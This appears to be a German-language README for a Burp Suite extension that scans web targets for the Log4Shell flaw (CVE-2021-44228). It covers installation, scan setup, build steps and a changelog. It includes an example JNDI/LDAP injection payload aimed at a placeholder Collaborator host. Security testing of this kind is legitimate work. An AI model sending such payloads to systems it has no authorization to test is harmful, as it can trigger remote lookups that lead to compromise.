Burp Erweiterung zum Scannen der Log4Shell (CVE-2021-44228) Schwachstelle mit benutzerdefinierten Payloads.
Haftungsausschluss
Ich bin nicht verantwortlich für Ihre Handlungen, das Einfrieren von Burp Suite, das Hacken des Ziels, einen thermonuklearen Krieg oder die aktuelle Wirtschaftskrise, die durch Ihre Befolgung dieser Anweisungen verursacht wird. SIE entscheiden sich, dieses Tool zu verwenden, und wenn Sie mit dem Finger auf mich zeigen, falls etwas schief geht, werde ich LMAO über Sie lachen.

Anleitung:
- Installieren Sie die Erweiterung entweder aus vorkompilierten Releases oder bauen Sie sie aus dem Quellcode.
- Deaktivieren/Abwählen aller anderen aktiven Scan-Erweiterungen wie active scan++, burp bounty pro, param-miner usw.
- Öffnen Sie aus dem oberen Menü die Einstellungen des Log4J Scanners.
- Fügen Sie Ihren benutzerdefinierten Payload hinzu und speichern Sie die Einstellungen.
- Wählen Sie Ihr Ziel > Rechtsklick > Scannen.
- Wählen Sie
Scan-Konfiguration > Aus Bibliothek auswählen
- Nur
Audit checks - extensions only auswählen und OK klicken.
Besonderer Dank geht an Silent Signal, die Anweisungen und Scan-Konfigurationen sind von seiner Erweiterung inspiriert.
Wichtige Hinweise zum Merken:
- Fügen Sie in Ihrem benutzerdefinierten Payload KEINE Collaborator-URL hinzu, fügen Sie lediglich
[collaborator-server] als Platzhalter ein,
[collaborator-server wird durch Ihre Collaborator-Server-URL selbst ersetzt.
- Beispiel-Payload:
"${jndi:ldap://[collaborator-server]/a}
Releases herunterladen
https://github.com/0xDexter0us/Log4J-Scanner/releases/
Aus dem Quellcode bauen
./gradlew build fatJar
- Holen Sie sich die JAR-Datei
build/libs/Log4J-Scanner-x.x.x.jar
Installation
- Laden Sie die neueste JAR aus den Releases herunter oder bauen Sie aus dem Quellcode.
- Fügen Sie die JAR zu Burp Suite hinzu.
Wenn Ihnen das Projekt gefällt, geben Sie dem Repository bitte einen Stern! <3
Ressourcen
- Für passives Scannen:
https://github.com/f0ng/log4j2burpscanner
- Für aktives Scannen:
https://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell
Änderungsprotokoll
25. Dezember 2021 - v0.2.0
- Burp Collaborator API hinzugefügt.
- Benutzerdefinierten Scanner entfernt.
- Burp Scanner API hinzugefügt.
13. Dezember 2021 - v0.1.0
- Erste öffentliche Veröffentlichung
Danke an
Dies wurde von mir innerhalb eines Tages codiert und ist eine erste Veröffentlichung. Fehler können auftreten, Fehlerberichte, Vorschläge und Pull-Requests sind willkommen :)

